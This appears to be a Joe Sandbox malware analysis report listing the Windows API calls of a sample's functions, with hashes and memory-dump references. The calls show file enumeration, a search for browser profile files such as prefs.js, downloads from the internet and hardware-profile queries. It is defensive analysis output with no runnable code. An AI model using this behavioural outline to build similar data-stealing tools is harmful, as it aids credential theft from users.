                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3193997572-0
                                                                                                                                                                                                                                                                  • Opcode ID: a6e97a9b642ce4f272f2b7ac04fd1bf2b8f51d33d3626c07c5e33cca13369ef9
                                                                                                                                                                                                                                                                  • Instruction ID: 47a40f45728d2e2ee9c8b41d03c0f5d8e1927227433d674527aabb726d1d105f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6e97a9b642ce4f272f2b7ac04fd1bf2b8f51d33d3626c07c5e33cca13369ef9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45A13B71904248EADB15EBE5D955BEDBBB4AF15308F24407EE406735C2DB781B0CCB26
                                                                                                                                                                                                                                                                  Function 004166DD Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004166E2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00416724
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00416743
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 25485560-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8f7dbe1a71c921630bed7633f9fd64842ad9024651e528680f03defee56be36d
                                                                                                                                                                                                                                                                  • Instruction ID: 23a6da286f37559405cbaecf0f78eafb40d0f0091ce0340678bd57fd622459ff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7dbe1a71c921630bed7633f9fd64842ad9024651e528680f03defee56be36d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5341AE71D00229BBDF01EBA0EC16EED3B7DEB08704F10455BF894A2152E73997988BD6
                                                                                                                                                                                                                                                                  Function 00411E9E Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411EA3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: _EH_prolog.MSVCRT ref: 00404E0D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E5C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: StrCmpCA.SHLWAPI(?), ref: 00404E76
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E9A
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404F06
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: CloseHandle.KERNEL32(?,?,00000400), ref: 00404F20
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetCloseHandle.WININET(00000000), ref: 00404F27
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetCloseHandle.WININET(?), ref: 00404F30
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EE2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                                                                                                                                                                                                  • String ID: B
                                                                                                                                                                                                                                                                  • API String ID: 1244342732-1255198513
                                                                                                                                                                                                                                                                  • Opcode ID: ccdbc191d3a2b05b56bf87e41fe33da18bf4983344432a353e0323b893537a71
                                                                                                                                                                                                                                                                  • Instruction ID: ab3e97ed26130ca04d3e0a3de3557a863076b82cdeec9429843be189f46c5c0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccdbc191d3a2b05b56bf87e41fe33da18bf4983344432a353e0323b893537a71
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D526A70904288EADF15E7A4D956BDDBBB46F29308F1440BEE449732C2DB781B4CCB66
                                                                                                                                                                                                                                                                  Function 0040B902 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B907
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: _EH_prolog.MSVCRT ref: 0040B4BB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B53A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B55E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B578
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B614
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                                                                                                                                                                                                  • String ID: \..\
                                                                                                                                                                                                                                                                  • API String ID: 271224408-4220915743
                                                                                                                                                                                                                                                                  • Opcode ID: f4b71888e373d1d7525e2025da1a8349b08a96917bae4b7b5e881cd22512136c
                                                                                                                                                                                                                                                                  • Instruction ID: 13f01921bcb38fc455ff60f4a5cd3831ac87943c681481868211784bb0e97aa5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4b71888e373d1d7525e2025da1a8349b08a96917bae4b7b5e881cd22512136c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0A16F71900288AACF14EBA5D556BDDBBB4AF15308F54407EE845736C2EB781B0CCBA6
                                                                                                                                                                                                                                                                  Function 00405E5C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: o@
                                                                                                                                                                                                                                                                  • API String ID: 0-3135860391
                                                                                                                                                                                                                                                                  • Opcode ID: 223f040fe90e85e3005b97b97141ae9f070b96e40fee60f84169d2a2138623e7
                                                                                                                                                                                                                                                                  • Instruction ID: 84a018e018659c41e8b0146644e5ccd4e70663ba36b0048f66b527bed373fe31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 223f040fe90e85e3005b97b97141ae9f070b96e40fee60f84169d2a2138623e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D411671A0461AAFCF14AF94D9809AFBBB5EB04314F10447FEA15B7391D6389A80CF59
                                                                                                                                                                                                                                                                  Function 00405DBC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405EEB), ref: 00405E3B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: d394932d53474e30a5efacc4d8c3eb3066922152f0b26aefe9648a07a82f7e33
                                                                                                                                                                                                                                                                  • Instruction ID: ff1c9841f155af56c2f4a372c586dd6ddee268370cde9542f2add13d0cc1f1b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d394932d53474e30a5efacc4d8c3eb3066922152f0b26aefe9648a07a82f7e33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE118C71510909ABDB24CF94E588BABF7E4FB04344F604437D581E26C0D7789B85DFAA
                                                                                                                                                                                                                                                                  Function 00411236 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 0041126F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileOperation
                                                                                                                                                                                                                                                                  • String ID: YrA
                                                                                                                                                                                                                                                                  • API String ID: 3080627654-2164172383
                                                                                                                                                                                                                                                                  • Opcode ID: 280da3326f968bdc4fbaf2a59c3f7cc4d1da38da12285f65e417dab7424ef2ae
                                                                                                                                                                                                                                                                  • Instruction ID: b04a682756f7d26cd4957ddb72d3e33d7f64999a516e6058490045f1c481612b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 280da3326f968bdc4fbaf2a59c3f7cc4d1da38da12285f65e417dab7424ef2ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E052B0E0421D9FCB44EFA9E9456EEBAF4AF48308F40806AD519E7240E7B456458BA9
                                                                                                                                                                                                                                                                  Function 004104EA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentProfile
                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                  • API String ID: 2104809126-1654365787
                                                                                                                                                                                                                                                                  • Opcode ID: bf28a4a0c6ad0aab3922940691f89e9df55f47749f7a1b52cc4efa55eb609e81
                                                                                                                                                                                                                                                                  • Instruction ID: 3ae3486a326379ad06c001b6fe43eaa520331b8a67875df45668faa9552b6485
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf28a4a0c6ad0aab3922940691f89e9df55f47749f7a1b52cc4efa55eb609e81
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E0EC70A0010DBBDB20DEA4D955B9D77ACAB04748F508025E941E2181DBB8D689DBA9
                                                                                                                                                                                                                                                                  Function 00410CC3 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
